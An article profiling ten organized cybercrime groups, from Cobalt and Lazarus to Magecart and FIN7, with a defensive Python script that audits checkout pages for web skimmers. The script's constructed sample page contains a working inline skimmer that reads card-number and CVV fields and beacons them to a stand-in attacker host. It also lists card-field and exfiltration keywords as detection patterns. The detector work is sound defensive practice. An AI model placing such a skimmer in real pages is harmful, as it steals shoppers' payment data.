Cybercrime has become so widespread and lucrative that well-organized groups of cybercriminals collaborate to carry out large-scale online heists. These cybercrime gangs consist of hackers, developers, and other tech outlaws who pool their expertise and resources to perform massive crimes that would otherwise be impossible to carry out.
In this article, we’ll be discussing ten of the most notorious organized cybercrime syndicates and how they operate.
Traditional Organized Crime vs. Cybercriminal Hacking Groups
Traditional organized crime and cybercrime have historically been treated as two separate worlds. However, one overarching message emerges from Europol's Serious and Organized Crime Threat Assessment 2017: organized crime has gone digital, erasing the distinction between the two.
Hackers infiltrating computer networks for the sake of amusement or glory are no longer the norm in the present era of cybercrime. The digital economy’s growth and expansion have radically altered the criminal landscape.
Cybercriminals seek to join with criminal bosses who have the vision, power, and connections to carry out complicated, far-reaching schemes and hacks, much like traditional organized crime does. These cybercriminal kingpins are only becoming better at what they’re doing.
The activities and business models of these global cybercrime syndicates are patterned after legitimate businesses. Security analysts believe they are educating new recruits, using collaborative programs, and even employing service agreements amongst the experts they hire.
Organized Cybercrime Activities
Hacking, fraud, the creation and distribution of malware, DDoS attacks, extortion, and intellectual property theft are just a few of the crimes that organized cybercriminals have committed. Cybercrime of this nature results in financial, psychological, social, and sometimes bodily harm, and it has also been used to fund other serious crimes, including terrorism.
Criminal organizations that participate in cybercrime also offer services that aid in the commission of crimes and cybercrime (crime as a service), such as:
- Stolen data and identity documents (including but not limited to voter registration identifications, health and financial data, and passports)
- Botnet services
- Distributed denial of service (DDoS) attacks
- Phishing or spear-phishing tools
- Hacking tutorials
- Information on flaws and vulnerabilities, as well as directions on how to abuse them
According to Europol, ransomware remains a high-value focus for criminal groups, with cryptomining malware entering the fray as a lower-risk alternative. Card skimming is still a popular way for gangs to make money, and many old scams, including advance-fee fraud, technical support scams, and romance scams, continue to claim a substantial number of victims. Europol also reports that hackers who previously attacked conventional financial institutions are now targeting businesses and cryptocurrency users.
10 Most Notorious Organized Cybercrime Syndicates
Here are some of the most infamous organized cybercrime groups in history.
1. Cobalt Cybercrime Gang
The Carbanak and Cobalt malware campaigns, which hit 100 financial institutions in more than 40 countries, were the work of this cybercrime organization. Its sophisticated campaigns against multiple banks netted over $11 million in a single heist and cost the banking sector more than a billion dollars in total losses.
A typical Cobalt attack began with spear-phishing emails carrying malware attachments sent to bank employees. Once an attachment was opened, the attackers had a foothold on the compromised computer and moved into the internal network, where they studied the bank's processes and routines for months.
The heists escalated when the group reached the systems that controlled the ATMs. In the final stage, ATMs were instructed to dispense cash remotely at scheduled times and designated locations, where a money mule was waiting to collect it, a technique known as "jackpotting."
The suspected ringleader was arrested in 2018, but similar attacks on several other institutions shortly after his capture have led investigators to conclude that the remaining members carried on where he left off.
2. Lazarus Gang
The Lazarus group, which is widely suspected of being tied to North Korea, is responsible for many damaging cyberattacks on organizations and institutions. The best known are the Sony Pictures hack in 2014 and the WannaCry ransomware attack that crippled England's NHS (National Health Service).
Sony Pictures Leak
In the notorious Sony Pictures incident, employees discovered that their company's network had been compromised. The hackers stole terabytes of sensitive information, wiped files, and threatened to release the data if Sony did not comply with their demands.
Systems were offline for days, and staff had to fall back on whiteboards. A few days later, the hackers began leaking the confidential data they had stolen to the media.
WannaCry Ransomware Attack
The Lazarus group is also suspected of being behind the 2017 WannaCry ransomware attack, which infected over a quarter of a million systems in 150 countries. It devastated several businesses and institutions, including the NHS in the United Kingdom, in the worst cyberattack the NHS has ever suffered.
WannaCry paralyzed parts of the NHS for days, forced the cancellation of over 6,000 appointments, and cost the service approximately $100 million.
3. MageCart Syndicate
This large e-commerce hacking ring, made up of various gangs operating under a single umbrella, became known for harvesting customer and payment card data. It did so through web skimming: malicious JavaScript injected into checkout pages that read card details as customers typed them into payment forms and sent them to attacker-controlled servers. Scores of e-commerce platforms, and other sites where customers regularly enter their card details, have been hit by Magecart gangs over the years.
A Magecart group, for example, breached British Airways in 2018. The incident compromised the financial and personal information of 380,000 customers, and the attack on the airline was only the beginning.
A few days after the British Airways hack, Magecart launched a large card-skimming operation against the hardware retailer Newegg. Magecart is also suspected of being behind the Ticketmaster data breach, which exposed the personal information of 40,000 customers.
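A practitioner reading about Magecart usually wants to know how to spot a skimmer on their own checkout page. The following script is an added example written for this article, not code from Magecart research or any of the companies named above. It parses a checkout page's HTML and flags the three things web skimmers typically depend on: a script loaded from a host that is not on the shop's allowlist, a third-party script without a Subresource Integrity hash (so a compromised CDN file would load silently), and an inline script with no CSP nonce that both reads card fields and sends data over the network. The allowlist hosts, the first-party host, and the sample checkout page are all constructed for the example.

```python
"""Audit the <script> tags of a checkout page for signs of web skimming (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party host and the hosts the shop legitimately loads scripts from.
FIRST_PARTY_HOST = "shop.example"
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.stripe.com"}

# Heuristics: an inline script that touches card fields AND sends data out is suspicious.
CARD_FIELD_HINTS = ("cardnumber", "card_number", "cc-number", "cvv", "cvc", "expiry")
EXFIL_HINTS = ("sendbeacon", "xmlhttprequest", "fetch(", "new image", "websocket")


class ScriptCollector(HTMLParser):
    """Collects every <script> tag with its attributes and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"),
                             "nonce": a.get("nonce"), "body": ""})
        self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data; they may arrive in chunks.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def looks_like_skimmer(body):
    """True if an inline script references card fields and an exfiltration primitive."""
    text = body.lower()
    return any(h in text for h in CARD_FIELD_HINTS) and any(h in text for h in EXFIL_HINTS)


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, first_party=FIRST_PARTY_HOST):
    """Return a list of (finding_kind, detail) tuples for the scripts on a page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"]:
            # A relative src is same-origin, so treat it as the first-party host.
            host = urlparse(s["src"]).hostname or first_party
            if host not in allowed_hosts:
                findings.append(("unexpected-host", s["src"]))
            elif host != first_party and not s["integrity"]:
                findings.append(("missing-sri", s["src"]))
        else:
            snippet = " ".join(s["body"].split())[:60]
            if not s["nonce"]:
                findings.append(("inline-no-nonce", snippet))
            if looks_like_skimmer(s["body"]):
                findings.append(("skimmer-pattern", snippet))
    return findings


# Constructed sample checkout page: one clean CDN script, one allowed third party
# without SRI, one script from an unknown host, one nonced config script, and one
# inline skimmer that reads the card fields and beacons them to an attacker host.
SAMPLE_CHECKOUT = """
<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-constructedhash"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://static-assets.example.net/modernizr.js"></script>
<script nonce="r4nd0m">window.shopConfig = {currency: "GBP"};</script>
<script>
  document.querySelector("#payment").addEventListener("submit", function () {
    var d = {n: document.querySelector("[name=cardnumber]").value,
             c: document.querySelector("[name=cvv]").value};
    navigator.sendBeacon("https://static-assets.example.net/collect", JSON.stringify(d));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_CHECKOUT):
        print(f"{kind:17} {detail}")
```

Run against the sample page, the audit reports a missing SRI hash on the payment-provider script, the unknown host, the inline script without a nonce, and the skimmer pattern in that same script. The host allowlist and SRI check are the cheap, high-value controls here; the keyword heuristic is a tripwire, not proof, and real skimmers are frequently obfuscated, so pair it with a Content Security Policy that blocks unlisted script sources and connect targets.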
4. Evil Corp
The name alone suggests the group is out to cause chaos. This Russia-based cybercrime organization has used a range of malware against a wide variety of targets, including a Pennsylvania school district.
Many of its victims are European and American institutions, and its members have eluded capture for years. The group is best known for the sophisticated Dridex banking Trojan, which allowed Evil Corp to steal login credentials from numerous banks and other financial institutions in 40 countries. At the peak of the Dridex operation, Evil Corp stole approximately $100 million.
So brazen are its members that videos of the suspected leaders showing off their sports cars and lavish lifestyles went viral. U.S. authorities indicted them in December 2019, but many analysts doubt the leaders will ever stand trial in the U.S.
The charges did not slow the group down. In 2020, Evil Corp was linked to a wave of new attacks on small and medium-sized businesses in the United States, including a campaign Symantec uncovered in June 2020 that targeted hundreds of U.S. companies. WastedLocker, a new strain of ransomware, was used against eight Fortune 500 firms.
5. GozNym Gang
The GozNym malware, a Trojan hybrid built to evade detection by security software, is the work of this worldwide cybercrime network.
GozNym is a two-headed beast that combines the Nymaim dropper with the Gozi banking malware. Thanks to this union, the malware could infect a victim's PC via malicious email attachments or links and then sit practically undetected, waiting for the user to log in to a bank account.
Login credentials were captured, funds were drained and routed to U.S. and overseas accounts, and money mules then laundered the proceeds. Over 41,000 machines were infected, and account holders were defrauded of more than $100 million.
Europol has since reported that the network behind GozNym has been dismantled.
6. DarkSide
The Colonial Pipeline ransomware attack in May 2021, which shut down the pipeline's fuel distribution system and caused gasoline shortages along the U.S. East Coast, was carried out by DarkSide.
The gang first appeared in August 2020. It primarily targets large corporations whose operations suffer when their services are disrupted, a crucial factor because such companies are more inclined to pay. They are also more likely to carry cyber insurance, which means easier money for the crooks.
DarkSide's business model is ransomware-as-a-service. The core group develops and maintains the ransomware and the payment and leak-site infrastructure, while affiliates carry out the actual intrusions, which keeps the operators one step removed from the break-ins. The proceeds are then split between the affiliate and the operators.
Cybercrime-as-a-service providers also run online forums for anyone who wants to improve their hacking skills. This can include coaching on how to combine DDoS and ransomware attacks to increase pressure during a negotiation: the ransomware stops a company from fulfilling existing orders, while the DDoS attack stops new orders from being placed.
7. REvil
The ransomware-as-a-service outfit REvil has made headlines because of the Kaseya supply-chain attack in July 2021 and the attack on the international meat processing giant JBS shortly before it. The group was highly active throughout 2020 and 2021.
In April 2021, REvil hacked Quanta Computer, a Taiwanese manufacturer that assembles Apple devices, and obtained technical data about upcoming Apple products. It demanded $50 million to stop the public release of the stolen information. Whether the payment was made is unknown.
8. Clop
Clop ransomware was launched in 2019 by a profit-driven gang accused of stealing half a billion dollars. The Clop group specializes in "double extortion": the victim pays one ransom for the decryption key that restores access to its encrypted files, and then faces a second ransom demand to stop the data that was stolen before encryption from being published.
Historical evidence shows that companies that have paid a ransom once are more willing to pay again. As a result, attackers return to the same firms repeatedly, demanding a larger amount each time.
9. Syrian Electronic Army
Unlike most cybercrime gangs, the Syrian Electronic Army has been waging online attacks to spread political propaganda since 2011, and its motivation has earned it the label of a hacktivist organization.
While the group has ties to Bashar al-Assad's regime, it is most likely composed of online vigilantes acting as an unofficial media wing for the Syrian army.
Its strategy is to push fake news through credible outlets. In 2013, a single tweet it posted from the hijacked official account of the Associated Press briefly wiped well over $100 billion off the stock market.
The Syrian Electronic Army exploits the fact that most online users read and react to information from trusted sources without questioning it. The group is also a prime illustration of how the lines between criminal, political, and terrorist organizations are far less clear online than in the physical world.
10. FIN7
FIN7, a Russia-based organization, is possibly the most successful organized cybercrime syndicate in history. It has been operating since 2012 and is run very much like a business.
For years, most of its activity went unnoticed. Its intrusions have made use of what might be called cross-attack events, in which a single compromise serves several purposes. For instance, the same breach can support ransomware extortion while also letting the attackers monetize the victim's data by selling it to another party.
In 2017, FIN7 was accused of targeting corporations that file documents with the U.S. Securities and Exchange Commission. The non-public data it obtained was used both for extortion and for trading on the stock market ahead of public disclosure.
The group profited handsomely from trading on that confidential material. Because the hacking-enabled insider-trading scheme ran for so long, the exact financial damage is impossible to calculate, but it is believed to run into the billions of dollars.
One of the most critical measures in the battle against organized cybercrime syndicates is understanding how they work. Experts hope that by analyzing them, they will be able to prevent attacks before they occur.
Cybersecurity professionals can help as well. Organizations benefit from experts who regularly evaluate their security controls, identify weaknesses, and devise new ways to protect mission-critical data. Cybersecurity consultants can also support employee education by keeping staff up to date on current attacker techniques and secure online habits.
Need help with cybersecurity? Connect with me.